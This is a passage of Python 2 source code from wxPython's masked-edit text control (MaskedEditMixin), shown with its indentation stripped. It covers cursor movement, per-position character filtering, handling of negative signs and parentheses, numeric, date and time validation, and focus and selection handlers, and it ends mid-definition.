def _goEnd(self, getPosOnly=False):
""" Moves the insertion point to the end of user-entry """
## dbg("MaskedEditMixin::_goEnd; getPosOnly:", getPosOnly, indent=1)
text = self._GetValue()
#### dbg('text: "%s"' % text)
i = 0
if len(text.rstrip()):
for i in range( min( self._masklength-1, len(text.rstrip())), -1, -1):
#### dbg('i:', i, 'self._isMaskChar(%d)' % i, self._isMaskChar(i))
if self._isMaskChar(i):
char = text[i]
#### dbg("text[%d]: '%s'" % (i, char))
if char != ' ':
i += 1
break
if i == 0:
pos = self._goHome(getPosOnly=True)
else:
pos = min(i,self._masklength)
field = self._FindField(pos)
start, end = field._extent
if field._insertRight and pos < end:
pos = end
## dbg('next pos:', pos)
## dbg(indent=0)
if getPosOnly:
return pos
else:
self._SetInsertionPoint(pos)
def _goHome(self, getPosOnly=False):
""" Moves the insertion point to the beginning of user-entry """
## dbg("MaskedEditMixin::_goHome; getPosOnly:", getPosOnly, indent=1)
text = self._GetValue()
for i in range(self._masklength):
if self._isMaskChar(i):
break
pos = max(i, 0)
## dbg(indent=0)
if getPosOnly:
return pos
else:
self._SetInsertionPoint(max(i,0))
def _getAllowedChars(self, pos):
""" Returns a string of all allowed user input characters for the provided
mask character plus control options
"""
maskChar = self.maskdict[pos]
okchars = self.maskchardict[maskChar] ## entry, get mask approved characters
# convert okchars to unicode if required; will force subsequent appendings to
# result in unicode strings
if 'unicode' in wx.PlatformInfo and type(okchars) != types.UnicodeType:
okchars = okchars.decode(self._defaultEncoding)
field = self._FindField(pos)
if okchars and field._okSpaces: ## Allow spaces?
okchars += " "
if okchars and field._includeChars: ## any additional included characters?
okchars += field._includeChars
#### dbg('okchars[%d]:' % pos, okchars)
return okchars
def _isMaskChar(self, pos):
""" Returns True if the char at position pos is a special mask character (e.g. NCXaA#)
"""
if pos < self._masklength:
return self._ismasked[pos]
else:
return False
def _isTemplateChar(self,Pos):
""" Returns True if the char at position pos is a template character (e.g. -not- NCXaA#)
"""
if Pos < self._masklength:
return not self._isMaskChar(Pos)
else:
return False
def _isCharAllowed(self, char, pos, checkRegex=False, allowAutoSelect=True, ignoreInsertRight=False):
""" Returns True if character is allowed at the specific position, otherwise False."""
## dbg('_isCharAllowed', char, pos, checkRegex, indent=1)
field = self._FindField(pos)
right_insert = False
if self.controlInitialized:
sel_start, sel_to = self._GetSelection()
else:
sel_start, sel_to = pos, pos
if (field._insertRight or self._ctrl_constraints._insertRight) and not ignoreInsertRight:
start, end = field._extent
field_len = end - start
if self.controlInitialized:
value = self._GetValue()
fstr = value[start:end].strip()
if field._padZero:
while fstr and fstr[0] == '0':
fstr = fstr[1:]
input_len = len(fstr)
if self._signOk and '-' in fstr or '(' in fstr:
input_len -= 1 # sign can move out of field, so don't consider it in length
else:
value = self._template
input_len = 0 # can't get the current "value", so use 0
# if entire field is selected or position is at end and field is not full,
# or if allowed to right-insert at any point in field and field is not full and cursor is not at a fillChar
# or the field is a singleton integer field and is currently 0 and we're at the end:
if( (sel_start, sel_to) == field._extent
or (pos == end and ((input_len < field_len)
or (field_len == 1
and input_len == field_len
and field._isInt
and value[end-1] == '0'
)
) ) ):
pos = end - 1
## dbg('pos = end - 1 = ', pos, 'right_insert? 1')
right_insert = True
elif( field._allowInsert and sel_start == sel_to
and (sel_to == end or (sel_to < self._masklength and value[sel_start] != field._fillChar))
and input_len < field_len ):
pos = sel_to - 1 # where character will go
## dbg('pos = sel_to - 1 = ', pos, 'right_insert? 1')
right_insert = True
# else leave pos alone...
else:
## dbg('pos stays ', pos, 'right_insert? 0')
pass
if self._isTemplateChar( pos ): ## if a template character, return empty
## dbg('%d is a template character; returning False' % pos, indent=0)
return False
if self._isMaskChar( pos ):
okChars = self._getAllowedChars(pos)
if self._fields[0]._groupdigits and (self._isInt or (self._isFloat and pos < self._decimalpos)):
okChars += self._fields[0]._groupChar
if self._signOk:
if self._isInt or (self._isFloat and pos < self._decimalpos):
okChars += '-'
if self._useParens:
okChars += '('
elif self._useParens and (self._isInt or (self._isFloat and pos > self._decimalpos)):
okChars += ')'
#### dbg('%s in %s?' % (char, okChars), char in okChars)
approved = (self.maskdict[pos] == '*' or char in okChars)
if approved and checkRegex:
## dbg("checking appropriate regex's")
value = self._eraseSelection(self._GetValue())
if right_insert:
# move the position to the right side of the insertion:
at = pos+1
else:
at = pos
if allowAutoSelect:
newvalue, ignore, ignore, ignore, ignore = self._insertKey(char, at, sel_start, sel_to, value, allowAutoSelect=True)
else:
newvalue, ignore = self._insertKey(char, at, sel_start, sel_to, value)
## dbg('newvalue: "%s"' % newvalue)
fields = [self._FindField(pos)] + [self._ctrl_constraints]
for field in fields: # includes fields[-1] == "ctrl_constraints"
if field._regexMask and field._filter:
## dbg('checking vs. regex')
start, end = field._extent
slice = newvalue[start:end]
approved = (re.match( field._filter, slice) is not None)
## dbg('approved?', approved)
if not approved: break
## dbg(indent=0)
return approved
else:
## dbg('%d is a !???! character; returning False', indent=0)
return False
def _applyFormatting(self):
""" Apply formatting depending on the control's state.
Need to find a way to call this whenever the value changes, in case the control's
value has been changed or set programatically.
"""
## dbg(suspend=1)
## dbg('MaskedEditMixin::_applyFormatting', indent=1)
# Handle negative numbers
if self._signOk:
text, signpos, right_signpos = self._getSignedValue()
## dbg('text: "%s", signpos:' % text, signpos)
if text and signpos != self._signpos:
self._signpos = signpos
if not text or text[signpos] not in ('-','('):
self._isNeg = False
## dbg('no valid sign found; new sign:', self._isNeg)
elif text and self._valid and not self._isNeg and text[signpos] in ('-', '('):
## dbg('setting _isNeg to True')
self._isNeg = True
## dbg('self._isNeg:', self._isNeg)
if self._signOk and self._isNeg:
fc = self._signedForegroundColour
else:
fc = self._foregroundColour
if hasattr(fc, '_name'):
c =fc._name
else:
c = fc
## dbg('setting foreground to', c)
self.SetForegroundColour(fc)
if self._valid:
## dbg('valid')
if self.IsEmpty():
bc = self._emptyBackgroundColour
else:
bc = self._validBackgroundColour
else:
## dbg('invalid')
bc = self._invalidBackgroundColour
if hasattr(bc, '_name'):
c =bc._name
else:
c = bc
## dbg('setting background to', c)
self.SetBackgroundColour(bc)
self._Refresh()
## dbg(indent=0, suspend=0)
def _getAbsValue(self, candidate=None):
""" Return an unsigned value (i.e. strip the '-' prefix if any), and sign position(s).
"""
## dbg('MaskedEditMixin::_getAbsValue; candidate="%s"' % candidate, indent=1)
if candidate is None: text = self._GetValue()
else: text = candidate
right_signpos = text.find(')')
if self._isInt:
if self._ctrl_constraints._alignRight and self._fields[0]._fillChar == ' ':
signpos = text.find('-')
if signpos == -1:
## dbg('no - found; searching for (')
signpos = text.find('(')
elif signpos != -1:
## dbg('- found at', signpos)
pass
if signpos == -1:
## dbg('signpos still -1')
## dbg('len(%s) (%d) < len(%s) (%d)?' % (text, len(text), self._mask, self._masklength), len(text) < self._masklength)
if len(text) < self._masklength:
text = ' ' + text
if len(text) < self._masklength:
text += ' '
if len(text) > self._masklength and text[-1] in (')', ' '):
text = text[:-1]
else:
## dbg('len(%s) (%d), len(%s) (%d)' % (text, len(text), self._mask, self._masklength))
## dbg('len(%s) - (len(%s) + 1):' % (text, text.lstrip()) , len(text) - (len(text.lstrip()) + 1))
signpos = len(text) - (len(text.lstrip()) + 1)
if self._useParens and not text.strip():
signpos -= 1 # empty value; use penultimate space
## dbg('signpos:', signpos)
if signpos >= 0:
text = text[:signpos] + ' ' + text[signpos+1:]
else:
if self._signOk:
signpos = 0
text = self._template[0] + text[1:]
else:
signpos = -1
if right_signpos != -1:
if self._signOk:
text = text[:right_signpos] + ' ' + text[right_signpos+1:]
elif len(text) > self._masklength:
text = text[:right_signpos] + text[right_signpos+1:]
right_signpos = -1
elif self._useParens and self._signOk:
# figure out where it ought to go:
right_signpos = self._masklength - 1 # initial guess
if not self._ctrl_constraints._alignRight:
## dbg('not right-aligned')
if len(text.strip()) == 0:
right_signpos = signpos + 1
elif len(text.strip()) < self._masklength:
right_signpos = len(text.rstrip())
## dbg('right_signpos:', right_signpos)
groupchar = self._fields[0]._groupChar
try:
value = long(text.replace(groupchar,'').replace('(','-').replace(')','').replace(' ', ''))
except:
## dbg('invalid number', indent=0)
return None, signpos, right_signpos
else: # float value
try:
groupchar = self._fields[0]._groupChar
value = float(text.replace(groupchar,'').replace(self._decimalChar, '.').replace('(', '-').replace(')','').replace(' ', ''))
## dbg('value:', value)
except:
value = None
if value < 0 and value is not None:
signpos = text.find('-')
if signpos == -1:
signpos = text.find('(')
text = text[:signpos] + self._template[signpos] + text[signpos+1:]
else:
# look forwards up to the decimal point for the 1st non-digit
## dbg('decimal pos:', self._decimalpos)
## dbg('text: "%s"' % text)
if self._signOk:
signpos = self._decimalpos - (len(text[:self._decimalpos].lstrip()) + 1)
# prevent checking for empty string - Tomo - Wed 14 Jan 2004 03:19:09 PM CET
if len(text) >= signpos+1 and text[signpos+1] in ('-','('):
signpos += 1
else:
signpos = -1
## dbg('signpos:', signpos)
if self._useParens:
if self._signOk:
right_signpos = self._masklength - 1
text = text[:right_signpos] + ' '
if text[signpos] == '(':
text = text[:signpos] + ' ' + text[signpos+1:]
else:
right_signpos = text.find(')')
if right_signpos != -1:
text = text[:-1]
right_signpos = -1
if value is None:
## dbg('invalid number')
text = None
## dbg('abstext = "%s"' % text, 'signpos:', signpos, 'right_signpos:', right_signpos)
## dbg(indent=0)
return text, signpos, right_signpos
def _getSignedValue(self, candidate=None):
""" Return a signed value by adding a "-" prefix if the value
is set to negative, or a space if positive.
"""
## dbg('MaskedEditMixin::_getSignedValue; candidate="%s"' % candidate, indent=1)
if candidate is None: text = self._GetValue()
else: text = candidate
abstext, signpos, right_signpos = self._getAbsValue(text)
if self._signOk:
if abstext is None:
## dbg(indent=0)
return abstext, signpos, right_signpos
if self._isNeg or text[signpos] in ('-', '('):
if self._useParens:
sign = '('
else:
sign = '-'
else:
sign = ' '
if abstext[signpos] not in string.digits:
text = abstext[:signpos] + sign + abstext[signpos+1:]
else:
# this can happen if value passed is too big; sign assumed to be
# in position 0, but if already filled with a digit, prepend sign...
text = sign + abstext
if self._useParens and text.find('(') != -1:
text = text[:right_signpos] + ')' + text[right_signpos+1:]
else:
text = abstext
## dbg('signedtext = "%s"' % text, 'signpos:', signpos, 'right_signpos', right_signpos)
## dbg(indent=0)
return text, signpos, right_signpos
def GetPlainValue(self, candidate=None):
""" Returns control's value stripped of the template text.
plainvalue = MaskedEditMixin.GetPlainValue()
"""
## dbg('MaskedEditMixin::GetPlainValue; candidate="%s"' % candidate, indent=1)
if candidate is None: text = self._GetValue()
else: text = candidate
if self.IsEmpty():
## dbg('returned ""', indent=0)
return ""
else:
plain = ""
for idx in range( min(len(self._template), len(text)) ):
if self._mask[idx] in maskchars:
plain += text[idx]
if self._isFloat or self._isInt:
## dbg('plain so far: "%s"' % plain)
plain = plain.replace('(', '-').replace(')', ' ')
## dbg('plain after sign regularization: "%s"' % plain)
if self._signOk and self._isNeg and plain.count('-') == 0:
# must be in reserved position; add to "plain value"
plain = '-' + plain.strip()
if self._fields[0]._alignRight:
lpad = plain.count(',')
plain = ' ' * lpad + plain.replace(',','')
else:
plain = plain.replace(',','')
## dbg('plain after pad and group:"%s"' % plain)
## dbg('returned "%s"' % plain.rstrip(), indent=0)
return plain.rstrip()
def IsEmpty(self, value=None):
"""
Returns True if control is equal to an empty value.
(Empty means all editable positions in the template == fillChar.)
"""
if value is None: value = self._GetValue()
if value == self._template and not self._defaultValue:
#### dbg("IsEmpty? 1 (value == self._template and not self._defaultValue)")
return True # (all mask chars == fillChar by defn)
elif value == self._template:
empty = True
for pos in range(len(self._template)):
#### dbg('isMaskChar(%(pos)d)?' % locals(), self._isMaskChar(pos))
#### dbg('value[%(pos)d] != self._fillChar?' %locals(), value[pos] != self._fillChar[pos])
if self._isMaskChar(pos) and value[pos] not in (' ', self._fillChar[pos]):
empty = False
#### dbg("IsEmpty? %(empty)d (do all mask chars == fillChar?)" % locals())
return empty
else:
#### dbg("IsEmpty? 0 (value doesn't match template)")
return False
def IsDefault(self, value=None):
"""
Returns True if the value specified (or the value of the control if not specified)
is equal to the default value.
"""
if value is None: value = self._GetValue()
return value == self._template
def IsValid(self, value=None):
""" Indicates whether the value specified (or the current value of the control
if not specified) is considered valid."""
#### dbg('MaskedEditMixin::IsValid("%s")' % value, indent=1)
if value is None: value = self._GetValue()
ret = self._CheckValid(value)
#### dbg(indent=0)
return ret
def _eraseSelection(self, value=None, sel_start=None, sel_to=None):
""" Used to blank the selection when inserting a new character. """
## dbg("MaskedEditMixin::_eraseSelection", indent=1)
if value is None: value = self._GetValue()
if sel_start is None or sel_to is None:
sel_start, sel_to = self._GetSelection() ## check for a range of selected text
## dbg('value: "%s"' % value)
## dbg("current sel_start, sel_to:", sel_start, sel_to)
newvalue = list(value)
for i in range(sel_start, sel_to):
if self._signOk and newvalue[i] in ('-', '(', ')'):
## dbg('found sign (%s) at' % newvalue[i], i)
# balance parentheses:
if newvalue[i] == '(':
right_signpos = value.find(')')
if right_signpos != -1:
newvalue[right_signpos] = ' '
elif newvalue[i] == ')':
left_signpos = value.find('(')
if left_signpos != -1:
newvalue[left_signpos] = ' '
newvalue[i] = ' '
elif self._isMaskChar(i):
field = self._FindField(i)
if field._padZero:
newvalue[i] = '0'
else:
newvalue[i] = self._template[i]
value = string.join(newvalue,"")
## dbg('new value: "%s"' % value)
## dbg(indent=0)
return value
def _insertKey(self, char, pos, sel_start, sel_to, value, allowAutoSelect=False):
""" Handles replacement of the character at the current insertion point."""
## dbg('MaskedEditMixin::_insertKey', "\'" + char + "\'", pos, sel_start, sel_to, '"%s"' % value, indent=1)
text = self._eraseSelection(value)
field = self._FindField(pos)
start, end = field._extent
newtext = ""
newpos = pos
# if >= 2 chars selected in a right-insert field, do appropriate erase on field,
# then set selection to end, and do usual right insert.
if sel_start != sel_to and sel_to >= sel_start+2:
field = self._FindField(sel_start)
if( field._insertRight # if right-insert
and field._allowInsert # and allow insert at any point in field
and field == self._FindField(sel_to) ): # and selection all in same field
text = self._OnErase(just_return_value=True) # remove selection before insert
## dbg('text after (left)erase: "%s"' % text)
pos = sel_start = sel_to
if pos != sel_start and sel_start == sel_to:
# adjustpos must have moved the position; make selection match:
sel_start = sel_to = pos
## dbg('field._insertRight?', field._insertRight)
## dbg('field._allowInsert?', field._allowInsert)
## dbg('sel_start, end', sel_start, end)
if sel_start < end:
## dbg('text[sel_start] != field._fillChar?', text[sel_start] != field._fillChar)
pass
if( field._insertRight # field allows right insert
and ((sel_start, sel_to) == field._extent # and whole field selected
or (sel_start == sel_to # or nothing selected
and (sel_start == end # and cursor at right edge
or (field._allowInsert # or field allows right-insert
and sel_start < end # next to other char in field:
and text[sel_start] != field._fillChar) ) ) ) ):
## dbg('insertRight')
fstr = text[start:end]
erasable_chars = [field._fillChar, ' ']
# if zero padding field, or a single digit, and currently a value of 0, allow erasure of 0:
if field._padZero or (field._isInt and (end - start == 1) and fstr[0] == '0'):
erasable_chars.append('0')
erased = ''
#### dbg("fstr[0]:'%s'" % fstr[0])
#### dbg('field_index:', field._index)
#### dbg("fstr[0] in erasable_chars?", fstr[0] in erasable_chars)
#### dbg("self._signOk and field._index == 0 and fstr[0] in ('-','(')?", self._signOk and field._index == 0 and fstr[0] in ('-','('))
if fstr[0] in erasable_chars or (self._signOk and field._index == 0 and fstr[0] in ('-','(')):
erased = fstr[0]
#### dbg('value: "%s"' % text)
#### dbg('fstr: "%s"' % fstr)
#### dbg("erased: '%s'" % erased)
field_sel_start = sel_start - start
field_sel_to = sel_to - start
## dbg('left fstr: "%s"' % fstr[1:field_sel_start])
## dbg('right fstr: "%s"' % fstr[field_sel_to:end])
fstr = fstr[1:field_sel_start] + char + fstr[field_sel_to:end]
if field._alignRight and sel_start != sel_to:
field_len = end - start
## pos += (field_len - len(fstr)) # move cursor right by deleted amount
pos = sel_to
## dbg('setting pos to:', pos)
if field._padZero:
fstr = '0' * (field_len - len(fstr)) + fstr
else:
fstr = fstr.rjust(field_len) # adjust the field accordingly
## dbg('field str: "%s"' % fstr)
newtext = text[:start] + fstr + text[end:]
if erased in ('-', '(') and self._signOk:
newtext = erased + newtext[1:]
## dbg('newtext: "%s"' % newtext)
if self._signOk and field._index == 0:
start -= 1 # account for sign position
#### dbg('field._moveOnFieldFull?', field._moveOnFieldFull)
#### dbg('len(fstr.lstrip()) == end-start?', len(fstr.lstrip()) == end-start)
if( field._moveOnFieldFull and pos == end
and len(fstr.lstrip()) == end-start # if field now full
and (not field._stopFieldChangeIfInvalid # and we either don't care about valid
or (field._stopFieldChangeIfInvalid # or we do and the current field value is valid
and field.IsValid(fstr)))):
newpos = self._findNextEntry(end) # go to next field
else:
newpos = pos # else keep cursor at current position
if not newtext:
## dbg('not newtext')
if newpos != pos:
## dbg('newpos:', newpos)
pass
if self._signOk and self._useParens:
old_right_signpos = text.find(')')
if field._allowInsert and not field._insertRight and sel_to <= end and sel_start >= start:
## dbg('inserting within a left-insert-capable field')
field_len = end - start
before = text[start:sel_start]
after = text[sel_to:end].strip()
#### dbg("current field:'%s'" % text[start:end])
#### dbg("before:'%s'" % before, "after:'%s'" % after)
new_len = len(before) + len(after) + 1 # (for inserted char)
#### dbg('new_len:', new_len)
if new_len < field_len:
retained = after + self._template[end-(field_len-new_len):end]
elif new_len > end-start:
retained = after[1:]
else:
retained = after
left = text[0:start] + before
#### dbg("left:'%s'" % left, "retained:'%s'" % retained)
right = retained + text[end:]
else:
left = text[0:pos]
right = text[pos+1:]
if 'unicode' in wx.PlatformInfo and type(char) != types.UnicodeType:
# convert the keyboard constant to a unicode value, to
# ensure it can be concatenated into the control value:
char = char.decode(self._defaultEncoding)
newtext = left + char + right
#### dbg('left: "%s"' % left)
#### dbg('right: "%s"' % right)
#### dbg('newtext: "%s"' % newtext)
if self._signOk and self._useParens:
# Balance parentheses:
left_signpos = newtext.find('(')
if left_signpos == -1: # erased '('; remove ')'
right_signpos = newtext.find(')')
if right_signpos != -1:
newtext = newtext[:right_signpos] + ' ' + newtext[right_signpos+1:]
elif old_right_signpos != -1:
right_signpos = newtext.find(')')
if right_signpos == -1: # just replaced right-paren
if newtext[pos] == ' ': # we just erased '); erase '('
newtext = newtext[:left_signpos] + ' ' + newtext[left_signpos+1:]
else: # replaced with digit; move ') over
if self._ctrl_constraints._alignRight or self._isFloat:
newtext = newtext[:-1] + ')'
else:
rstripped_text = newtext.rstrip()
right_signpos = len(rstripped_text)
## dbg('old_right_signpos:', old_right_signpos, 'right signpos now:', right_signpos)
newtext = newtext[:right_signpos] + ')' + newtext[right_signpos+1:]
if( field._insertRight # if insert-right field (but we didn't start at right edge)
and field._moveOnFieldFull # and should move cursor when full
and len(newtext[start:end].strip()) == end-start # and field now full
and (not field._stopFieldChangeIfInvalid # and we either don't care about valid
or (field._stopFieldChangeIfInvalid # or we do and the current field value is valid
and field.IsValid(newtext[start:end].strip())))):
newpos = self._findNextEntry(end) # go to next field
## dbg('newpos = nextentry =', newpos)
else:
## dbg('pos:', pos, 'newpos:', pos+1)
newpos = pos+1
if allowAutoSelect:
new_select_to = newpos # (default return values)
match_field = None
match_index = None
if field._autoSelect:
match_index, partial_match = self._autoComplete(1, # (always forward)
field._compareChoices,
newtext[start:end],
compareNoCase=field._compareNoCase,
current_index = field._autoCompleteIndex-1)
if match_index is not None and partial_match:
matched_str = newtext[start:end]
newtext = newtext[:start] + field._choices[match_index] + newtext[end:]
new_select_to = end
match_field = field
if field._insertRight:
# adjust position to just after partial match in field
newpos = end - (len(field._choices[match_index].strip()) - len(matched_str.strip()))
elif self._ctrl_constraints._autoSelect:
match_index, partial_match = self._autoComplete(
1, # (always forward)
self._ctrl_constraints._compareChoices,
newtext,
self._ctrl_constraints._compareNoCase,
current_index = self._ctrl_constraints._autoCompleteIndex - 1)
if match_index is not None and partial_match:
matched_str = newtext
newtext = self._ctrl_constraints._choices[match_index]
edit_end = self._ctrl_constraints._extent[1]
new_select_to = min(edit_end, len(newtext.rstrip()))
match_field = self._ctrl_constraints
if self._ctrl_constraints._insertRight:
# adjust position to just after partial match in control:
newpos = self._masklength - (len(self._ctrl_constraints._choices[match_index].strip()) - len(matched_str.strip()))
## dbg('newtext: "%s"' % newtext, 'newpos:', newpos, 'new_select_to:', new_select_to)
## dbg(indent=0)
return newtext, newpos, new_select_to, match_field, match_index
else:
## dbg('newtext: "%s"' % newtext, 'newpos:', newpos)
## dbg(indent=0)
return newtext, newpos
def _OnFocus(self,event):
"""
This event handler is currently necessary to work around new default
behavior as of wxPython2.3.3;
The TAB key auto selects the entire contents of the wx.TextCtrl *after*
the EVT_SET_FOCUS event occurs; therefore we can't query/adjust the selection
*here*, because it hasn't happened yet. So to prevent this behavior, and
preserve the correct selection when the focus event is not due to tab,
we need to pull the following trick:
"""
## dbg('MaskedEditMixin::_OnFocus')
if self.IsBeingDeleted() or self.GetParent().IsBeingDeleted():
return
wx.CallAfter(self._fixSelection)
event.Skip()
self.Refresh()
def _CheckValid(self, candidate=None):
"""
This is the default validation checking routine; It verifies that the
current value of the control is a "valid value," and has the side
effect of coloring the control appropriately.
"""
## dbg(suspend=1)
## dbg('MaskedEditMixin::_CheckValid: candidate="%s"' % candidate, indent=1)
oldValid = self._valid
if candidate is None: value = self._GetValue()
else: value = candidate
## dbg('value: "%s"' % value)
oldvalue = value
valid = True # assume True
if not self.IsDefault(value) and self._isDate: ## Date type validation
valid = self._validateDate(value)
## dbg("valid date?", valid)
elif not self.IsDefault(value) and self._isTime:
valid = self._validateTime(value)
## dbg("valid time?", valid)
elif not self.IsDefault(value) and (self._isInt or self._isFloat): ## Numeric type
valid = self._validateNumeric(value)
## dbg("valid Number?", valid)
if valid: # and not self.IsDefault(value): ## generic validation accounts for IsDefault()
## valid so far; ensure also allowed by any list or regex provided:
valid = self._validateGeneric(value)
## dbg("valid value?", valid)
## dbg('valid?', valid)
if not candidate:
self._valid = valid
self._applyFormatting()
if self._valid != oldValid:
## dbg('validity changed: oldValid =',oldValid,'newvalid =', self._valid)
## dbg('oldvalue: "%s"' % oldvalue, 'newvalue: "%s"' % self._GetValue())
pass
## dbg(indent=0, suspend=0)
return valid
def _validateGeneric(self, candidate=None):
""" Validate the current value using the provided list or Regex filter (if any).
"""
if candidate is None:
text = self._GetValue()
else:
text = candidate
valid = True # assume True
for i in [-1] + self._field_indices: # process global constraints first:
field = self._fields[i]
start, end = field._extent
slice = text[start:end]
valid = field.IsValid(slice)
if not valid:
break
return valid
def _validateNumeric(self, candidate=None):
""" Validate that the value is within the specified range (if specified.)"""
if candidate is None: value = self._GetValue()
else: value = candidate
try:
groupchar = self._fields[0]._groupChar
if self._isFloat:
number = float(value.replace(groupchar, '').replace(self._decimalChar, '.').replace('(', '-').replace(')', ''))
else:
number = long( value.replace(groupchar, '').replace('(', '-').replace(')', ''))
if value.strip():
if self._fields[0]._alignRight:
require_digit_at = self._fields[0]._extent[1]-1
else:
require_digit_at = self._fields[0]._extent[0]
## dbg('require_digit_at:', require_digit_at)
## dbg("value[rda]: '%s'" % value[require_digit_at])
if value[require_digit_at] not in list(string.digits):
valid = False
return valid
# else...
## dbg('number:', number)
if self._ctrl_constraints._hasRange:
valid = self._ctrl_constraints._rangeLow <= number <= self._ctrl_constraints._rangeHigh
else:
valid = True
groupcharpos = value.rfind(groupchar)
if groupcharpos != -1: # group char present
## dbg('groupchar found at', groupcharpos)
if self._isFloat and groupcharpos > self._decimalpos:
# 1st one found on right-hand side is past decimal point
## dbg('groupchar in fraction; illegal')
return False
elif self._isFloat:
integer = value[:self._decimalpos].strip()
else:
integer = value.strip()
## dbg("integer:'%s'" % integer)
if integer[0] in ('-', '('):
integer = integer[1:]
if integer[-1] == ')':
integer = integer[:-1]
parts = integer.split(groupchar)
## dbg('parts:', parts)
for i in range(len(parts)):
if i == 0 and abs(int(parts[0])) > 999:
## dbg('group 0 too long; illegal')
valid = False
break
elif i > 0 and (len(parts[i]) != 3 or ' ' in parts[i]):
## dbg('group %i (%s) not right size; illegal' % (i, parts[i]))
valid = False
break
except ValueError:
## dbg('value not a valid number')
valid = False
return valid
def _validateDate(self, candidate=None):
""" Validate the current date value using the provided Regex filter.
Generally used for character types.BufferType
"""
## dbg('MaskedEditMixin::_validateDate', indent=1)
if candidate is None: value = self._GetValue()
else: value = candidate
## dbg('value = "%s"' % value)
text = self._adjustDate(value, force4digit_year=True) ## Fix the date up before validating it
## dbg('text =', text)
valid = True # assume True until proven otherwise
try:
# replace fillChar in each field with space:
datestr = text[0:self._dateExtent]
for i in range(3):
field = self._fields[i]
start, end = field._extent
fstr = datestr[start:end]
fstr.replace(field._fillChar, ' ')
datestr = datestr[:start] + fstr + datestr[end:]
year, month, day = _getDateParts( datestr, self._datestyle)
year = int(year)
## dbg('self._dateExtent:', self._dateExtent)
if self._dateExtent == 11:
month = charmonths_dict[month.lower()]
else:
month = int(month)
day = int(day)
## dbg('year, month, day:', year, month, day)
except ValueError:
## dbg('cannot convert string to integer parts')
valid = False
except KeyError:
## dbg('cannot convert string to integer month')
valid = False
if valid:
# use wxDateTime to unambiguously try to parse the date:
# ### Note: because wxDateTime is *brain-dead* and expects months 0-11,
# rather than 1-12, so handle accordingly:
if month > 12:
valid = False
else:
month -= 1
try:
## dbg("trying to create date from values day=%d, month=%d, year=%d" % (day,month,year))
dateHandler = wx.DateTimeFromDMY(day,month,year)
## dbg("succeeded")
dateOk = True
except:
## dbg('cannot convert string to valid date')
dateOk = False
if not dateOk:
valid = False
if valid:
# wxDateTime doesn't take kindly to leading/trailing spaces when parsing,
# so we eliminate them here:
timeStr = text[self._dateExtent+1:].strip() ## time portion of the string
if timeStr:
## dbg('timeStr: "%s"' % timeStr)
try:
checkTime = dateHandler.ParseTime(timeStr)
valid = checkTime == len(timeStr)
except:
valid = False
if not valid:
## dbg('cannot convert string to valid time')
pass
## if valid: dbg('valid date')
## dbg(indent=0)
return valid
def _validateTime(self, candidate=None):
""" Validate the current time value using the provided Regex filter.
Generally used for character types.BufferType
"""
## dbg('MaskedEditMixin::_validateTime', indent=1)
# wxDateTime doesn't take kindly to leading/trailing spaces when parsing,
# so we eliminate them here:
if candidate is None: value = self._GetValue().strip()
else: value = candidate.strip()
## dbg('value = "%s"' % value)
valid = True # assume True until proven otherwise
dateHandler = wx.DateTime_Today()
try:
checkTime = dateHandler.ParseTime(value)
## dbg('checkTime:', checkTime, 'len(value)', len(value))
valid = checkTime == len(value)
except:
valid = False
if not valid:
## dbg('cannot convert string to valid time')
pass
## if valid: dbg('valid time')
## dbg(indent=0)
return valid
def _OnKillFocus(self,event):
""" Handler for EVT_KILL_FOCUS event.
"""
## dbg('MaskedEditMixin::_OnKillFocus', 'isDate=',self._isDate, indent=1)
if self.IsBeingDeleted() or self.GetParent().IsBeingDeleted():
return
if self._mask and self._IsEditable():
self._AdjustField(self._GetInsertionPoint())
self._CheckValid() ## Call valid handler
self._LostFocus() ## Provided for subclass use
event.Skip()
## dbg(indent=0)
def _fixSelection(self):
"""
This gets called after the TAB traversal selection is made, if the
focus event was due to this, but before the EVT_LEFT_* events if
the focus shift was due to a mouse event.
The trouble is that, a priori, there's no explicit notification of
why the focus event we received. However, the whole reason we need to
do this is because the default behavior on TAB traveral in a wx.TextCtrl is
now to select the entire contents of the window, something we don't want.
So we can *now* test the selection range, and if it's "the whole text"
we can assume the cause, change the insertion point to the start of
the control, and deselect.
"""
## dbg('MaskedEditMixin::_fixSelection', indent=1)
# can get here if called with wx.CallAfter after underlying
# control has been destroyed on close, but after focus
# events
if not self or not self._mask or not self._IsEditable():
## dbg(indent=0)
return
sel_start, sel_to = self._GetSelection()
## dbg('sel_start, sel_to:', sel_start, sel_to, 'self.IsEmpty()?', self.IsEmpty())
if( sel_start == 0 and sel_to >= len( self._mask ) #(can be greater in numeric controls because of reserved space)
and (not self._ctrl_constraints._autoSelect or self.IsEmpty() or self.IsDefault() ) ):
# This isn't normally allowed, and so assume we got here by the new
# "tab traversal" behavior, so we need to reset the selection
# and insertion point:
## dbg('entire text selected; resetting selection to start of control')
self._goHome()
field = self._FindField(self._GetInsertionPoint())
edit_start, edit_end = field._extent
if field._selectOnFieldEntry:
if self._isFloat or self._isInt and field == self._fields[0]:
edit_start = 0
self._SetInsertionPoint(edit_start)
self._SetSelection(edit_start, edit_end)
elif field._insertRight:
self._SetInsertionPoint(edit_end)
self._SetSelection(edit_end, edit_end)
elif (self._isFloat or self._isInt):
text, signpos, right_signpos = self._getAbsValue()
if text is None or text == self._template:
integer = self._fields[0]
edit_start, edit_end = integer._extent
if integer._selectOnFieldEntry:
## dbg('select on field entry:')
self._SetInsertionPoint(0)
self._SetSelection(0, edit_end)
elif integer._insertRight:
## dbg('moving insertion point to end')
self._SetInsertionPoint(edit_end)
self._SetSelection(edit_end, edit_end)
else:
## dbg('numeric ctrl is empty; start at beginning after sign')
self._SetInsertionPoint(signpos+1) ## Move past minus sign space if signed
self._SetSelection(signpos+1, signpos+1)
elif sel_start > self._goEnd(getPosOnly=True):
## dbg('cursor beyond the end of the user input; go to end of it')
self._goEnd()
else:
## dbg('sel_start, sel_to:', sel_start, sel_to, 'self._masklength:', self._masklength)
pass
## dbg(indent=0)
def _Keypress(self,key):
""" Method provided to override OnChar routine. Return False to force
a skip of the 'normal' OnChar process. Called before class OnChar.
"""
return True
def _LostFocus(self):
""" Method provided for subclasses. _LostFocus() is called after
the class processes its EVT_KILL_FOCUS event code.
"""
pass
def _OnDoubleClick(self, event):
""" selects field under cursor on dclick."""
pos = self._GetInsertionPoint()
field = self._FindField(pos)
start, end = field._extent
self._SetInsertionPoint(start)
self._SetSelection(start, end)
def _Change(self):
""" Method provided for subclasses. Called by internal EVT_TEXT
handler. Return False to override the class handler, True otherwise.
"""
return True
def _Cut(self):
"""
